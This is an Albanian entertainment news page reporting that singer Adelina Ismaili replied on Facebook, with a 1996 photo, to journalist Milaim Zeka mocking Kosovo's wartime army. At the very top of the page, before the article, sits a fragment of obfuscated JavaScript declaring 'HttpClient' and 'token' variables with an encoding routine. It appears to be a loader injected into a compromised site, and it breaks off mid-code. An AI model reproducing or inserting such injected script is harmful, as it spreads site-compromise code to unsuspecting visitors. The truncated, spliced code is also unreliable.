;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Lajmërohet Adelina Ismaili: Reagon për atë që më së paku e prisni!

By

Këngëtarja Adelina Ismaili, e njohur si diva e muzikës moderne shqiptare së fundmi ka qenë në fokus të madh të medias rozë.

Shtatzënia, jetesa në Zvicërr e dashuria me Valin kanë qenë disa prej piketave kryesore për të cilat emri i këngëtares ka qenë i lakuar në shtyp por nga Adelina nuk është se kemi marrë ndonjë gjë.

Hermetike si gjithmonë, ajo nuk ka reaguar shumë mirëpo një zhvillim i fundit ka bërë që ajo të lë një mesazh të fortë.

Themelimi i ushtrisë së Kosovës ka qenë tema që e ka rikthyer me reagime këngëtaren shkruan Prive.al.

Pak minuta pasi gazetari Milaim Zeka përqeshi ushtrinë e Ibrahim Rugovës për të cilën tha se kryekomandante mund të ketë qenë Adelina Ismaili me këngën e saj, këngëtarja ka zgjedhur Facebook-un për t’i thënë disa fjalë. 

Më poshtë fotografia dhe foto e ndarë nga Adelina. 

Meqenëse u kthye në trend të flitet për ushtrinë e Kosovës: Miq, ju përshendes me një foto nga fundi i 1996, atëherë kur edhe unë si vajzë 17 vjeqare e Prishtinës e njihja krijimin e UÇK-së. Dhe guxoja ti këndoja, e vetmja… Sa do të kisha dashur që atëhere ti kisha njohur disa “gjeneralë” të facebookut , do ti thërrisja të vinin të më ruanin mua nga policia sërbe. Por, duke i njohur si i njoh sot, rrezik se do të përfundonin nën fustanin tim (në këtë rast nën pantallonat e ushtrisë) Chill, se dada vjen apet ?A.I.

Image may contain: 1 person, on stage and standing

Artikuj të ngjashëm